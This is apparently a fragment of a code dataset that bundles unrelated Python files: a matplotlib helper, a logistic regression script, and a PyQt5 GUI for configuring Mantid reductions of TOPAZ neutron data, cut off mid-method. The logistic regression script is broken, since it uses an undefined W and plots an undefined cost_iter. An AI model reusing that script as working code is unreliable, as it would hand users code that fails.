folder=folder,grid=False,save_data=False,ncol=2,legend_loc='top',ymax=0.1,\n )","sub_path":"Code/Paper_Simulations/Thesis/Concurrent/sensitivity.py","file_name":"sensitivity.py","file_ext":"py","file_size_in_byte":9250,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"284739912","text":"## Do NOT modify the code in this file\nimport matplotlib as mpl\n\nmpl.use('Agg')\nimport matplotlib.pyplot as plt\n\nplt.style.use('ggplot')\n\n# save the visualization of weights into a file\ndef save_fig(args, inner_matrix, inner_file_name):\n inner_fig = plt.figure()\n for i in range(inner_matrix.shape[0]):\n ax = inner_fig.add_subplot(1, inner_matrix.shape[0], i + 1)\n ax.imshow(inner_matrix[i].reshape(args.image_fashion_mnist_width, args.image_fashion_mnist_height))\n plt.xticks([])\n plt.yticks([])\n inner_fig.savefig(inner_file_name)\n plt.close(inner_fig)\n","sub_path":"Assignment3/template/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":595,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"294009227","text":"\n# A.T. January 27 2016\n# LogisticRegression.py\n# A program for Logistic Regression\n# Copyright 2016 Amirhessam Tahmassebi \n\n# Loading Packages\n\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport math\n\n# Loading Data Set: Hill-Valley\n\nX = np.loadtxt(\"./X.dat\")\nY = np.loadtxt(\"./Y.dat\")\nX_Test = np.loadtxt(\"./Xtest.dat\")\nY_Test = np.loadtxt(\"./Ytest.dat\")\n\n# Function for Logistic Function\n\ndef logistic_func(W, X):\n return float(1) / (1 + math.e**(-X.dot(W)))\n \n# Function for Cost \ndef cost_func(W, X, Y):\n log_func_v = logistic_func(W,X)\n Y = np.squeeze(Y)\n step1 = Y * np.log(log_func_v)\n step2 = (1-Y) * np.log(1 - log_func_v)\n final = -step1 - step2\n return np.mean(final)\n \n# Function for Logistic Gradient \n\ndef log_gradient(W, X, Y):\n first_calc = logistic_func(W, X) - np.squeeze(Y)\n final_calc = first_calc.T.dot(X)\n return final_calc\n \n\ndef grad_desc(W, X, Y, lr=.001, converge_change=.001):\n\t\n #normalize\n X = (X - np.mean(X, axis=0)) / np.std(X, axis=0)\n #setup cost iter\n cost_iter = []\n cost = cost_func(W, X, Y)\n cost_iter.append([0, cost])\n change_cost = 1\n i = 1\n while(change_cost > converge_change):\n old_cost = cost\n W = W - (lr * log_gradient(W, X, Y))\n cost = cost_func(W, X, Y)\n cost_iter.append([i, cost])\n change_cost = old_cost - cost\n i+=1\n return W, np.array(cost_iter)\n\ngrad_desc(W,X, Y, lr=.001, converge_change=.001)\n#print W_values, cost_iter\n# Ploting the Errors versus Max Depth\nfig = plt.figure()\nplt.title('Data : HILL-VALLEY')\t\nL1, = plt.plot(np.array(cost_iter),W,'-bo', label = \"Training Error\")\n#L2, = plt.plot(range(1,13),Testing_Error,'-r*', label = \"Testing Error\")\nplt.ylabel('Misclassification Error')\nplt.xlabel('Iteration ')\nplt.legend()\nplt.grid(True)\nplt.show()\n","sub_path":"LogisticRegression.py","file_name":"LogisticRegression.py","file_ext":"py","file_size_in_byte":1863,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"166438515","text":"#!/usr/bin/env python\n\nfrom PyQt5 import QtCore, QtGui, QtWidgets # Import the PyQt5 module we'll need\nfrom shutil import copyfile\nimport sys # We need sys so that we can pass argv to QApplication\nfrom subprocess import PIPE, Popen\nimport signal\nimport design # This file holds our MainWindow and all design related things\nimport mod3.ReduceDictionary as ReduceDictionary\nimport shlex\nimport math\nimport time\n\n# it also keeps events etc that we defined in Qt Designer\nimport os # For listing filepath methods\nimport string\n\nclass MantidReduction(QtWidgets.QMainWindow, design.Ui_MainWindow):\n def __init__(self):\n # Explaining super is out of the scope of this article\n # So please google it if you're not familar with it\n # Simple reason why we use it here is that it allows us to\n # access variables, methods etc in the design.py file\n super(self.__class__, self).__init__()\n self.setupUi(self) # This is defined in design.py file automatically\n # It sets up layout and widgets that are defined\n self.setDefaults()\n self.ConfigFileName_ledt.textChanged.connect(self.change_Configfile)\n self.ConfigFile_btn.clicked.connect(self.Configbrowse_file) # When the button is pressed\n self.BackgroundFileName_ledt.textChanged.connect(self.change_file)\n self.BackgroundFile_btn.clicked.connect(self.browse_file) # When the button is pressed\n self.UBFileName_ledt.textChanged.connect(self.change_UBfile)\n self.UBFile_btn.clicked.connect(self.UBbrowse_file) # When the button is pressed\n self.instrument_cmbx.currentIndexChanged.connect(self.change_instrument)\n self.z_score_ledt.textChanged.connect(self.input_z_score)\n self.bkg_inner_radius_ledt.textChanged.connect(self.input_bkg_inner_radius)\n self.bkg_outer_radius_ledt.textChanged.connect(self.input_bkg_outer_radius)\n self.CalFileName_ledt.textChanged.connect(self.change_cal_file)\n self.CalFile_btn.clicked.connect(self.browse_cal_file) # When the button is pressed\n self.spectraFileName_ledt.textChanged.connect(self.change_spectra_file)\n self.spectraFile_btn.clicked.connect(self.browse_spectra_file) # When the button is pressed\n self.pred_minDSpacing_ledt.textChanged.connect(self.change_pred_minDSpacing)\n self.pred_maxDSpacing_ledt.textChanged.connect(self.change_pred_maxDSpacing)\n self.pred_minWavelength_ledt.textChanged.connect(self.change_pred_minWavelength)\n self.pred_maxWavelength_ledt.textChanged.connect(self.change_pred_maxWavelength)\n self.minDSpacing_ledt.textChanged.connect(self.change_minDSpacing)\n self.minWavelength_ledt.textChanged.connect(self.change_minWavelength)\n self.maxWavelength_ledt.textChanged.connect(self.change_maxWavelength)\n self.pointGroup_cmbx.currentIndexChanged.connect(self.change_pointGroup)\n self.laueGroup_cmbx.currentIndexChanged.connect(self.change_laueGroup)\n self.centering_cmbx.currentIndexChanged.connect(self.change_centering)\n self.sampleRadius_ledt.textChanged.connect(self.change_sampleRadius)\n self.molecularFormula_ledt.textChanged.connect(self.change_molecularFormula)\n self.expName_ledt.textChanged.connect(self.change_expName)\n self.runNums_ledt.textChanged.connect(self.change_runNums)\n self.Z_ledt.textChanged.connect(self.change_Z)\n self.unitCellVolume_ledt.textChanged.connect(self.change_unitCellVolume)\n self.splitThreshold_ledt.textChanged.connect(self.change_splitThreshold)\n self.maxQspace_ledt.textChanged.connect(self.change_maxQ)\n self.maxQspace_ledt_2.editingFinished.connect(self.change_maxQ2)\n 
self.numberPeaks_ledt.textChanged.connect(self.change_numPeaks)\n self.minABC_ledt.textChanged.connect(self.change_minABC)\n self.maxABC_ledt.textChanged.connect(self.change_maxABC)\n self.tolerance_ledt.textChanged.connect(self.change_tolerance)\n self.peakRadius_ledt.textChanged.connect(self.change_peakRadius)\n self.minIntensity_ledt.textChanged.connect(self.change_minIntensity)\n self.normToWavelength_ledt.textChanged.connect(self.change_normToWavelength)\n self.predictPeaks_chbx.stateChanged.connect(self.predict_peaks) # When the button is pressed\n self.modStruct_chbx.stateChanged.connect(self.plot_modStruct) # When the button is pressed\n self.live_chbx.stateChanged.connect(self.change_live) # When the button is pressed\n self.minIsigI_ledt.textChanged.connect(self.change_minIsigI)\n self.scaleFactor_ledt.textChanged.connect(self.change_scaleFactor)\n self.edgePixels_ledt.textChanged.connect(self.change_edgePixels)\n self.starting_batch_number_ledt.textChanged.connect(self.change_starting_batch_number)\n self.borderPixels_ledt.textChanged.connect(self.change_borderPixels)\n self.ellipse_size_specified_chbx.stateChanged.connect(self.ellipse_size) # When the button is pressed\n self.dataDirectory_ledt.textChanged.connect(self.change_datadir)\n self.dataDirectory_btn.clicked.connect(self.browse_datadir) # When the button is pressed\n self.PushButton_config.clicked.connect(self.accept) # When the button is pressed\n self.PushButton_auto.clicked.connect(self.auto) # When the button is pressed\n self.PushButton_run.clicked.connect(self.run) # When the button is pressed\n self.PushButton_kill.clicked.connect(self.reject) # When the button is pressed\n #plot data\n self.h1.currentIndexChanged.connect(self.change_h1)\n self.k1.currentIndexChanged.connect(self.change_k1)\n self.l1.currentIndexChanged.connect(self.change_l1)\n self.xmin1.textChanged.connect(self.change_xmin1)\n self.xmax1.textChanged.connect(self.change_xmax1)\n self.xsteps1.textChanged.connect(self.change_xsteps1)\n self.ymin1.textChanged.connect(self.change_ymin1)\n self.ymax1.textChanged.connect(self.change_ymax1)\n self.ysteps1.textChanged.connect(self.change_ysteps1)\n self.slice1.textChanged.connect(self.change_slice1)\n self.thickness1.textChanged.connect(self.change_thickness1)\n self.h2.currentIndexChanged.connect(self.change_h2)\n self.k2.currentIndexChanged.connect(self.change_k2)\n self.l2.currentIndexChanged.connect(self.change_l2)\n self.xmin2.textChanged.connect(self.change_xmin2)\n self.xmax2.textChanged.connect(self.change_xmax2)\n self.xsteps2.textChanged.connect(self.change_xsteps2)\n self.ymin2.textChanged.connect(self.change_ymin2)\n self.ymax2.textChanged.connect(self.change_ymax2)\n self.ysteps2.textChanged.connect(self.change_ysteps2)\n self.slice2.textChanged.connect(self.change_slice2)\n self.thickness2.textChanged.connect(self.change_thickness2)\n self.h3.currentIndexChanged.connect(self.change_h3)\n self.k3.currentIndexChanged.connect(self.change_k3)\n self.l3.currentIndexChanged.connect(self.change_l3)\n self.xmin3.textChanged.connect(self.change_xmin3)\n self.xmax3.textChanged.connect(self.change_xmax3)\n self.xsteps3.textChanged.connect(self.change_xsteps3)\n self.ymin3.textChanged.connect(self.change_ymin3)\n self.ymax3.textChanged.connect(self.change_ymax3)\n self.ysteps3.textChanged.connect(self.change_ysteps3)\n self.slice3.textChanged.connect(self.change_slice3)\n self.thickness3.textChanged.connect(self.change_thickness3)\n self.FluxFile_ledt.textChanged.connect(self.change_Fluxfile)\n 
self.FluxFile_btn.clicked.connect(self.Fluxbrowse_file) # When the button is pressed\n self.SAFile_ledt.textChanged.connect(self.change_SAfile)\n self.SAFile_btn.clicked.connect(self.SAbrowse_file) # When the button is pressed\n # satellite\n self.tolerance_satellite_ledt.textChanged.connect(self.change_tolerance_satellite)\n self.mod_vec_1_dh_ledt.textChanged.connect(self.change_mod_vec_1_dh)\n self.mod_vec_1_dk_ledt.textChanged.connect(self.change_mod_vec_1_dk)\n self.mod_vec_1_dl_ledt.textChanged.connect(self.change_mod_vec_1_dl)\n self.mod_vec_2_dh_ledt.textChanged.connect(self.change_mod_vec_2_dh)\n self.mod_vec_2_dk_ledt.textChanged.connect(self.change_mod_vec_2_dk)\n self.mod_vec_2_dl_ledt.textChanged.connect(self.change_mod_vec_2_dl)\n self.mod_vec_3_dh_ledt.textChanged.connect(self.change_mod_vec_3_dh)\n self.mod_vec_3_dk_ledt.textChanged.connect(self.change_mod_vec_3_dk)\n self.mod_vec_3_dl_ledt.textChanged.connect(self.change_mod_vec_3_dl)\n self.max_order_ledt.textChanged.connect(self.change_max_order)\n self.cross_terms_chbx.stateChanged.connect(self.change_cross_terms) \n self.save_mod_info_chbx.stateChanged.connect(self.change_save_mod_info) \n self.sat_peak_region_radius_ledt.textChanged.connect(self.change_sat_peak_region_radius)\n self.sat_peak_radius_ledt.textChanged.connect(self.change_sat_peak_radius)\n self.sat_peak_inner_radius_ledt.textChanged.connect(self.change_sat_peak_inner_radius)\n self.sat_peak_outer_radius_ledt.textChanged.connect(self.change_sat_peak_outer_radius)\n self.satellite_chbx.stateChanged.connect(self.hide_satellites)\n self.tabWidget.setTabEnabled(3, self.satellite_chbx.isChecked())\n \n def hide_satellites(self):\n self.tabWidget.setTabEnabled(3, self.satellite_chbx.isChecked())\n self.max_order = self.max_order_ledt.text() if self.satellite_chbx.isChecked() else 0\n \n def change_h1(self):\n self._h1 = self.h1.currentText()\n\n def change_k1(self):\n self._k1 = self.k1.currentText()\n\n def change_l1(self):\n self._l1 = self.l1.currentText()\n\n def change_xmin1(self):\n self._xmin1 = self.toDouble(self.xmin1.text())\n\n def change_xmax1(self):\n self._xmax1 = self.toDouble(self.xmax1.text())\n\n def change_xsteps1(self):\n self._xsteps1 = self.toInt(self.xsteps1.text())\n\n def change_ymin1(self):\n self._ymin1 = self.toDouble(self.ymin1.text())\n\n def change_ymax1(self):\n self._ymax1 = self.toDouble(self.ymax1.text())\n\n def change_ysteps1(self):\n self._ysteps1 = self.toInt(self.ysteps1.text())\n\n def change_slice1(self):\n self._slice1 = self.toDouble(self.slice1.text())\n thickness1 = self.toFloat(self._thickness1)\n self._zmin1 = self._slice1 - 0.5 * thickness1\n self._zmax1 = self._slice1 + 0.5 * thickness1\n\n def change_thickness1(self):\n self._thickness1 = self.toDouble(self.thickness1.text())\n slice1 = self.toFloat(self._slice1)\n self._zmin1 = slice1 - 0.5 * self._thickness1\n self._zmax1 = slice1 + 0.5 * self._thickness1\n\n def change_h2(self):\n self._h2 = self.h2.currentText()\n\n def change_k2(self):\n self._k2 = self.k2.currentText()\n\n def change_l2(self):\n self._l2 = self.l2.currentText()\n\n def change_xmin2(self):\n self._xmin2 = self.toDouble(self.xmin2.text())\n\n def change_xmax2(self):\n self._xmax2 = self.toDouble(self.xmax2.text())\n\n def change_xsteps2(self):\n self._xsteps2 = self.toInt(self.xsteps2.text())\n\n def change_ymin2(self):\n self._ymin2 = self.toDouble(self.ymin2.text())\n\n def change_ymax2(self):\n self._ymax2 = self.toDouble(self.ymax2.text())\n\n def change_ysteps2(self):\n self._ysteps2 = 
self.toInt(self.ysteps2.text())\n\n def change_slice2(self):\n self._slice2 = self.toDouble(self.slice2.text())\n thickness2 = self.toFloat(self._thickness2)\n self._zmin2 = self._slice2 - 0.5 * thickness2\n self._zmax2 = self._slice2 + 0.5 * thickness2\n\n def change_thickness2(self):\n self._thickness2 = self.toDouble(self.thickness2.text())\n slice2 = self.toFloat(self._slice2)\n self._zmin2 = slice2 - 0.5 * self._thickness2\n self._zmax2 = slice2 + 0.5 * self._thickness2\n\n def change_h3(self):\n self._h3 = self.h3.currentText()\n\n def change_k3(self):\n self._k3 = self.k3.currentText()\n\n def change_l3(self):\n self._l3 = self.l3.currentText()\n\n def change_xmin3(self):\n self._xmin3 = self.toDouble(self.xmin3.text())\n\n def change_xmax3(self):\n self._xmax3 = self.toDouble(self.xmax3.text())\n\n def change_xsteps3(self):\n self._xsteps3 = self.toInt(self.xsteps3.text())\n\n def change_ymin3(self):\n self._ymin3 = self.toDouble(self.ymin3.text())\n\n def change_ymax3(self):\n self._ymax3 = self.toDouble(self.ymax3.text())\n\n def change_ysteps3(self):\n self._ysteps3 = self.toInt(self.ysteps3.text())\n\n def change_slice3(self):\n self._slice3 = self.toDouble(self.slice3.text())\n thickness3 = self.toFloat(self._thickness3)\n self._zmin3 = self._slice3 - 0.5 * thickness3\n self._zmax3 = self._slice3 + 0.5 * thickness3\n\n def change_thickness3(self):\n self._thickness3 = self.toDouble(self.thickness3.text())\n slice3 = self.toFloat(self._slice3)\n self._zmin3 = slice3 - 0.5 * self._thickness3\n self._zmax3 = slice3 + 0.5 * self._thickness3\n\n def format_template(self, name, outfile, **kwargs):\n \"This fills in the values for the template called 'name' and writes it to 'outfile'\"\n template = open(name).read()\n formatter = string.Formatter()\n data = formatter.format(template, **kwargs)\n f = open(outfile, \"w\")\n try:\n f.write(data)\n finally:\n f.close()\n\n def setDefaults(self):\n self.molecularFormula = \"\"\n self.Z = str( 0.0)\n self.unitCellVolume = str( 0.0)\n self.sampleRadius = str( 0.0)\n self.centering = \"P\"\n self.laueGroup = \"Triclinic\"\n self.pointGroup = \"-1\"\n self.instrument = \"TOPAZ\"\n self.runNums = \"\"\n baseDir = os.getcwd()\n self.dataDirectory = baseDir[:baseDir.find(\"shared\")]+\"nexus\"\n self.dataDirectory_ledt.setText(self.dataDirectory)\n self.expName = \"\"\n self.calFileName = \"/SNS/TOPAZ/shared/calibrations/2019A/Calibration/TOPAZ_2019A.DetCal\"\n self.subtract_bkg = str( False)\n self.backgroundFileName = \"None\"\n self.read_UB = str( False)\n self.UBFileName = \"None\"\n self.maxQ = str(17.0)\n self.splitThreshold = str(80)\n self.edgePixels = str(0)\n self.numPeaksToFind = str( 500)\n self.abcMin = str( 3)\n self.abcMax = str( 18)\n self.tolerance = str( 0.12)\n self.predictPeaks = str( True)\n self.live = False\n self.pred_minDSpacing = str( 0.499)\n self.pred_maxDSpacing = str( 11.0)\n self.pred_minWavelength = str( 0.4)\n self.pred_maxWavelength = str( 3.45)\n self.ellipse_size_specified = str( True)\n self.peakRadius = str( 0.11)\n self.bkg_inner_radius = str( 0.115)\n self.bkg_outer_radius = str( 0.14)\n self.spectraFileName='/SNS/TOPAZ/shared/calibrations/2019A/Calibration/Spectrum_32751_32758.dat'\n self.normToWavelength = str(1.0)\n self.scaleFactor = str(0.05)\n self.minIntensity = str( 10)\n self.minIsigI = str(2.0)\n self.borderPixels = str(18)\n self.minDSpacing = str( 0.5)\n self.minWavelength = str( 0.4)\n self.maxWavelength = str( 3.5)\n self.z_score = str( 4.0)\n self.starting_batch_number = str( 1)\n 
self.modStruct = False\n self._h1 = \"H\"\n self._k1 = \"K\"\n self._l1 = \"L\"\n self._xmin1 = \"\"\n self._xmax1 = \"\"\n self._xsteps1 = str(400)\n self._ymin1 = \"\"\n self._ymax1 = \"\"\n self._ysteps1 = str(400)\n self._slice1 = str(0.0)\n self._thickness1 = str(0.1)\n self._zmin1 = str(-0.005)\n self._zmax1 = str(0.005)\n self._h2 = \"H\"\n self._k2 = \"L\"\n self._l2 = \"K\"\n self._xmin2 = \"\"\n self._xmax2 = \"\"\n self._xsteps2 = str(400)\n self._ymin2 = \"\"\n self._ymax2 = \"\"\n self._ysteps2 = str(400)\n self._slice2 = str(0.0)\n self._thickness2 = str(0.1)\n self._zmin2 = str(-0.005)\n self._zmax2 = str(0.005)\n self._h3 = \"K\"\n self._k3 = \"L\"\n self._l3 = \"H\"\n self._xmin3 = \"\"\n self._xmax3 = \"\"\n self._xsteps3 = str(400)\n self._ymin3 = \"\"\n self._ymax3 = \"\"\n self._ysteps3 = str(400)\n self._slice3 = str(0.0)\n self._thickness3 = str(0.1)\n self._zmin3 = str(-0.005)\n self._zmax3 = str(0.005)\n self.SAFile = \"\"\n self.FluxFile = \"\"\n\n def loadConfig(self, config_file_name):\n params_dictionary = ReduceDictionary.LoadDictionary( config_file_name )\n self.molecularFormula = str(params_dictionary[ \"formulaString\" ])\n self.molecularFormula_ledt.setText(self.molecularFormula)\n self.Z = str(self.toFloat(params_dictionary[ \"zParameter\" ]))\n self.Z_ledt.setText(self.Z)\n self.unitCellVolume = str(self.toFloat(params_dictionary[ \"unitCellVolume\" ]))\n self.unitCellVolume_ledt.setText(self.unitCellVolume)\n self.sampleRadius = str(self.toFloat(params_dictionary.get(\"sampleRadius\",'1.0')))\n self.sampleRadius_ledt.setText(self.sampleRadius)\n self.centering = str(params_dictionary[ \"centering\" ])\n self.centering_cmbx.setCurrentIndex(self.centering_cmbx.findText(self.centering, QtCore.Qt.MatchFixedString))\n self.laueGroup = str(params_dictionary[ \"cell_type\" ])\n self.laueGroup_cmbx.setCurrentIndex(self.laueGroup_cmbx.findText(self.laueGroup, QtCore.Qt.MatchFixedString))\n self.pointGroup = str(params_dictionary[\"pg_symbol\"])\n self.pointGroup_cmbx.setCurrentIndex(self.pointGroup_cmbx.findText(self.pointGroup, QtCore.Qt.MatchFixedString))\n self.instrument = str(params_dictionary[ \"instrument_name\" ])\n self.instrument_cmbx.setCurrentIndex(self.instrument_cmbx.findText(self.instrument, QtCore.Qt.MatchFixedString))\n file = open(config_file_name)\n for line in file:\n line = line.strip();\n line = line.rstrip();\n if (not line.startswith('#')) and len(line) > 2:\n words = shlex.split(line)\n if len(words) > 1:\n if words[0] == \"run_nums\":\n self.runNums = words[1]\n self.runNums = str(self.runNums).strip('[]')\n self.runNums = self.runNums.replace(\" \", \"\")\n self.runNums = self.runNums.replace(\"'\", \"\")\n self.runNums_ledt.setText(self.runNums)\n self.dataDirectory=str(params_dictionary[ \"data_directory\" ])\n self.dataDirectory_ledt.setText(self.dataDirectory)\n #Do not copy experiment name so you will not overwrite previous data\n #self.expName = str(params_dictionary[ \"exp_name\" ])\n self.expName_ledt.setText(self.expName)\n self.calFileName = str(params_dictionary[ \"calibration_file_1\" ])\n self.CalFileName_ledt.setText(self.calFileName)\n self.subtract_bkg = params_dictionary[ \"subtract_bkg\" ]\n self.backgroundFileName = str(params_dictionary[ \"no_sample_event_nxs_fname\" ])\n self.BackgroundFileName_ledt.setText(self.backgroundFileName)\n self.read_UB = params_dictionary[ \"read_UB\" ]\n self.UBFileName = str(params_dictionary[ \"UB_filename\" ])\n self.UBFileName_ledt.setText(self.UBFileName)\n self.maxQ = 
str(params_dictionary.get('Qmax', \"20\"))\n self.maxQspace_ledt.setText(self.maxQ)\n self.splitThreshold = str(params_dictionary[ \"split_threshold\" ])\n self.splitThreshold_ledt.setText(self.splitThreshold)\n self.edgePixels = str(params_dictionary[ \"n_bad_edge_pixels\" ])\n self.edgePixels_ledt.setText(self.edgePixels)\n self.numPeaksToFind = str(params_dictionary[ \"num_peaks_to_find\" ])\n self.numberPeaks_ledt.setText(self.numPeaksToFind)\n self.abcMin = str(params_dictionary[ \"min_d\" ])\n self.minABC_ledt.setText(self.abcMin)\n self.abcMax = str(params_dictionary[ \"max_d\" ])\n self.maxABC_ledt.setText(self.abcMax)\n self.tolerance = str(params_dictionary[ \"tolerance\" ])\n self.tolerance_ledt.setText(self.tolerance)\n self.predictPeaks = self.toBool(params_dictionary[ \"integrate_predicted_peaks\" ])\n self.predictPeaks_chbx.setChecked(self.predictPeaks)\n self.pred_minDSpacing = str(params_dictionary[ \"min_pred_dspacing\" ])\n self.pred_minDSpacing_ledt.setText(self.pred_minDSpacing)\n self.pred_maxDSpacing = str(params_dictionary[ \"max_pred_dspacing\" ])\n self.pred_maxDSpacing_ledt.setText(self.pred_maxDSpacing)\n self.pred_minWavelength = str(params_dictionary[ \"min_pred_wl\" ])\n self.pred_minWavelength_ledt.setText(self.pred_minWavelength)\n self.pred_maxWavelength = str(params_dictionary[ \"max_pred_wl\" ])\n self.pred_maxWavelength_ledt.setText(self.pred_maxWavelength)\n self.ellipse_size_specified = self.toBool(params_dictionary[ \"ellipse_size_specified\" ])\n self.ellipse_size_specified_chbx.setChecked(self.ellipse_size_specified)\n self.peakRadius = str(params_dictionary[ \"peak_radius\" ])\n self.peakRadius_ledt.setText(self.peakRadius)\n self.bkg_inner_radius = str(params_dictionary[ \"bkg_inner_radius\" ])\n self.bkg_inner_radius_ledt.setText(self.bkg_inner_radius)\n self.bkg_outer_radius = str(params_dictionary[ \"bkg_outer_radius\" ])\n self.bkg_outer_radius_ledt.setText(self.bkg_outer_radius)\n self.spectraFileName = str(params_dictionary[\"spectraFile\"])\n self.spectraFileName_ledt.setText(self.spectraFileName)\n self.normToWavelength = str(self.toFloat(params_dictionary[\"normToWavelength\"]))\n self.normToWavelength_ledt.setText(self.normToWavelength)\n self.scaleFactor = str(self.toFloat(params_dictionary[\"scaleFactor\"]))\n self.scaleFactor_ledt.setText(self.scaleFactor)\n self.minIntensity = str(self.toFloat(params_dictionary[\"intiMin\"]))\n self.minIntensity_ledt.setText(self.minIntensity)\n self.minIsigI = str(self.toFloat(params_dictionary[\"minIsigI\"]))\n self.minIsigI_ledt.setText(self.minIsigI)\n self.borderPixels = str(self.toInt(params_dictionary[\"numBorderCh\"]))\n self.borderPixels_ledt.setText(self.borderPixels)\n self.minDSpacing = str(self.toFloat(params_dictionary[\"dMin\"]))\n self.minDSpacing_ledt.setText(self.minDSpacing)\n self.minWavelength = str(self.toFloat(params_dictionary[\"wlMin\"]))\n self.minWavelength_ledt.setText(self.minWavelength)\n self.maxWavelength = str(self.toFloat(params_dictionary[\"wlMax\"]))\n self.maxWavelength_ledt.setText(self.maxWavelength)\n self.z_score = str(self.toFloat(params_dictionary[\"z_score\"]))\n self.z_score_ledt.setText(self.z_score)\n self.starting_batch_number = str(self.toInt(params_dictionary.get(\"starting_batch_number\",'1')))\n self.starting_batch_number_ledt.setText(self.starting_batch_number)\n self.tolerance_satellite = str(params_dictionary[ \"tolerance_satellite\" ])\n self.tolerance_satellite_ledt.setText(self.tolerance_satellite)\n mod_vec_1 = str(params_dictionary[ 
\"mod_vector1\" ])\n mod_vec_2 = str(params_dictionary[ \"mod_vector2\" ])\n mod_vec_3 = str(params_dictionary[ \"mod_vector3\" ])\n self.mod_vec_1_dh = mod_vec_1.split(',')[0]\n self.mod_vec_1_dk = mod_vec_1.split(',')[1]\n self.mod_vec_1_dl = mod_vec_1.split(',')[2]\n self.mod_vec_2_dh = mod_vec_2.split(',')[0]\n self.mod_vec_2_dk = mod_vec_2.split(',')[1]\n self.mod_vec_2_dl = mod_vec_2.split(',')[2]\n self.mod_vec_3_dh = mod_vec_3.split(',')[0]\n self.mod_vec_3_dk = mod_vec_3.split(',')[1]\n self.mod_vec_3_dl = mod_vec_3.split(',')[2]\n self.mod_vec_1_dh_ledt.setText(self.mod_vec_1_dh)\n self.mod_vec_1_dk_ledt.setText(self.mod_vec_1_dk)\n self.mod_vec_1_dl_ledt.setText(self.mod_vec_1_dl)\n self.mod_vec_2_dh_ledt.setText(self.mod_vec_2_dh)\n self.mod_vec_2_dk_ledt.setText(self.mod_vec_2_dk)\n self.mod_vec_2_dl_ledt.setText(self.mod_vec_2_dl)\n self.mod_vec_3_dh_ledt.setText(self.mod_vec_3_dh)\n self.mod_vec_3_dk_ledt.setText(self.mod_vec_3_dk)\n self.mod_vec_3_dl_ledt.setText(self.mod_vec_3_dl)\n self.max_order = str(params_dictionary[ \"max_order\" ])\n self.max_order_ledt.setText(self.max_order)\n self.satellite_chbx.setChecked(self.max_order > 0)\n self.hide_satellites()\n self.cross_terms = self.toBool(params_dictionary[ \"cross_terms\" ])\n self.cross_terms_chbx.setChecked(self.cross_terms)\n self.save_mod_info = self.toBool(params_dictionary[ \"save_mod_info\" ])\n self.save_mod_info_chbx.setChecked(self.save_mod_info) \n self.sat_peak_radius = str(params_dictionary[ \"satellite_peak_size\" ])\n self.sat_peak_radius_ledt.setText(self.sat_peak_radius)\n self.sat_peak_region_radius = str(params_dictionary[ \"satellite_region_radius\" ])\n self.sat_peak_region_radius_ledt.setText(self.sat_peak_region_radius)\n self.sat_peak_inner_radius = str(params_dictionary[ \"satellite_background_inner_size\" ])\n self.sat_peak_inner_radius_ledt.setText(self.sat_peak_inner_radius)\n self.sat_peak_outer_radius = str(params_dictionary[ \"satellite_background_outer_size\" ])\n self.sat_peak_outer_radius_ledt.setText(self.sat_peak_outer_radius)\n\n def change_instrument(self):\n self.instrument = self.instrument_cmbx.currentText()\n\n def change_laueGroup(self):\n self.laueGroup = self.laueGroup_cmbx.currentText()\n self.pointGroup_cmbx.clear()\n list1 = []\n if self.laueGroup == \"Triclinic\":\n list1 = [\n self.tr('-1'),\n self.tr('1'),\n ]\n elif self.laueGroup == \"Monoclinic\":\n list1 = [\n self.tr('2/m'),\n self.tr('2'),\n self.tr('m'),\n self.tr('112'),\n self.tr('112/m'),\n self.tr('11m'),\n ]\n elif self.laueGroup == \"Orthorhombic\":\n list1 = [\n self.tr('mmm'),\n self.tr('222'),\n self.tr('mm2'),\n self.tr('2mm'),\n self.tr('m2m'),\n ]\n elif self.laueGroup == \"Tetragonal\":\n list1 = [\n self.tr('4/m'),\n self.tr('4/mmm'),\n self.tr('-4'),\n self.tr('-42m'),\n self.tr('-4m2'),\n self.tr('4'),\n self.tr('422'),\n self.tr('4mm'),\n ]\n elif self.laueGroup == \"Rhombohedral\":\n list1 = [\n self.tr('-3'),\n self.tr('-3m'),\n self.tr('3'),\n self.tr('32'),\n self.tr('3m'),\n self.tr('-3 r'),\n self.tr('-31m'),\n self.tr('-3m r'),\n self.tr('3 r'),\n self.tr('312'),\n self.tr('31m'),\n self.tr('32 r'),\n self.tr('321'),\n self.tr('3m r'),\n self.tr('3m1'),\n ]\n elif self.laueGroup == \"Hexagonal\":\n list1 = [\n self.tr('6/m'),\n self.tr('6/mmm'),\n self.tr('6'),\n self.tr('-6'),\n self.tr('622'),\n self.tr('6mm'),\n self.tr('-62m'),\n self.tr('-6m2'),\n ]\n elif self.laueGroup == \"Cubic\":\n list1 = [\n self.tr('m-3'),\n self.tr('m-3m'),\n self.tr('23'),\n self.tr('432'),\n 
self.tr('-43m'),\n ]\n self.pointGroup_cmbx.addItems(list1)\n\n\n def change_pointGroup(self):\n self.pointGroup = self.pointGroup_cmbx.currentText()\n\n def change_centering(self):\n self.centering = self.centering_cmbx.currentText()\n self.laueGroup_cmbx.clear()\n list1 = []\n if self.centering == \"P\":\n list1 = [\n self.tr('Triclinic'),\n self.tr('Monoclinic'),\n self.tr('Orthorhombic'),\n self.tr('Tetragonal'),\n self.tr('Rhombohedral'),\n self.tr('Hexagonal'),\n self.tr('Cubic'),\n ]\n elif self.centering == \"I\":\n list1 = [\n self.tr('Tetragonal'),\n self.tr('Monoclinic'),\n self.tr('Cubic'),\n self.tr('Orthorhombic'),\n ]\n elif self.centering == \"C\":\n list1 = [\n self.tr('Monoclinic'),\n self.tr('Orthorhombic'),\n ]\n elif self.centering == \"F\":\n list1 = [\n self.tr('Orthorhombic'),\n self.tr('Cubic'),\n ]\n elif self.centering == \"R\":\n list1 = [\n self.tr('Rhombohedral'),\n ]\n self.laueGroup_cmbx.addItems(list1)\n\n def input_z_score(self):\n self.z_score = self.toDouble(self.z_score_ledt.text())\n\n def input_bkg_inner_radius(self):\n self.bkg_inner_radius = self.toDouble(self.bkg_inner_radius_ledt.text())\n\n def input_bkg_outer_radius(self):\n self.bkg_outer_radius = self.toDouble(self.bkg_outer_radius_ledt.text())\n\n def change_Configfile(self):\n self.ConfigFileName = self.ConfigFileName_ledt.text()\n if self.ConfigFileName != \"None\":\n self.loadConfig(self.ConfigFileName)\n\n def change_SAfile(self):\n self.SAFile = 